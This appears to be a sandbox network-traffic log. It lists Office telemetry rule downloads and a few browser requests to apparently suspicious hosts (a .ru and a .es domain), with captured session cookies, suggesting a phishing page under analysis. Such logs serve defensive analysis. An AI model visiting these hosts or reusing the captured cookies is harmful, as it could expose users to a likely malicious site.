              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /chiriya!bpgf4e HTTP/1.1Host: dau2bh.hxnywi.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://oazh.jyqhucdd.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /chiriya!bpgf4e HTTP/1.1Host: dau2bh.hxnywi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /Yx6Is/ HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://oazh.jyqhucdd.es/Yx6Is/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImVYQjdHV2NXbmM4bzhGWDhMZ0w5R0E9PSIsInZhbHVlIjoiWks4L2JXK3FiRTZHTURxeE1OWE9ZdGd1Q0RsZjRWb1RrTmVZRDArNDVjdjZqVWxWZXRBbmlXRHY3YVlaejA2d2pmd0crcVRzVG8wQVZZUDhONUljYjhtUC9OV3FyWnZyL202RXNpdlcrY3VzWXU0dFFYQlRHR05RdVdkUGRleGYiLCJtYWMiOiI0NTRiMTM2YTNmMmNjNzE0NmJkMzNjMGY2ZmE5ZDc5NDAyN2I5ZWZmNzY5NmU0NmJhNWMzNmY5ODI0NjUyYmM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklZaXFCYWxyWTF4TlJoenhuRGRBR3c9PSIsInZhbHVlIjoiUldOYUR2blNGRnh3TzJYeUcrVDNIT2oycGZNeXdiL1p1djdTK2tuaGFVNXZPVkw0Y0Jzc3R6TWFmbkhGOHVRdjlEK0s2eVJ2U1NGV2Q0RFJPb2RjanpGNUh2aVVhd0I0MTZ1bk9XSjdmTllrc0pramY5ZmE5UWV6VVJSQkovT0ciLCJtYWMiOiJjYjJiMzFiNjZlNjFmZTZiMzNhMWNlNjVkN2VkMTFiYjc5NmViMWUyZWE4NTlkMzVkYzFhMTQ5ZjY4YmUwMzMwIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /bvrfwb0JcL7uFmzRHk78EBHkK0YWUObzp HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImVYQjdHV2NXbmM4bzhGWDhMZ0w5R0E9PSIsInZhbHVlIjoiWks4L2JXK3FiRTZHTURxeE1OWE9ZdGd1Q0RsZjRWb1RrTmVZRDArNDVjdjZqVWxWZXRBbmlXRHY3YVlaejA2d2pmd0crcVRzVG8wQVZZUDhONUljYjhtUC9OV3FyWnZyL202RXNpdlcrY3VzWXU0dFFYQlRHR05RdVdkUGRleGYiLCJtYWMiOiI0NTRiMTM2YTNmMmNjNzE0NmJkMzNjMGY2ZmE5ZDc5NDAyN2I5ZWZmNzY5NmU0NmJhNWMzNmY5ODI0NjUyYmM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklZaXFCYWxyWTF4TlJoenhuRGRBR3c9PSIsInZhbHVlIjoiUldOYUR2blNGRnh3TzJYeUcrVDNIT2oycGZNeXdiL1p1djdTK2tuaGFVNXZPVkw0Y0Jzc3R6TWFmbkhGOHVRdjlEK0s2eVJ2U1NGV2Q0RFJPb2RjanpGNUh2aVVhd0I0MTZ1bk9XSjdmTllrc0pramY5ZmE5UWV6VVJSQkovT0ciLCJtYWMiOiJjYjJiMzFiNjZlNjFmZTZiMzNhMWNlNjVkN2VkMTFiYjc5NmViMWUyZWE4NTlkMzVkYzFhMTQ5ZjY4YmUwMzMwIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
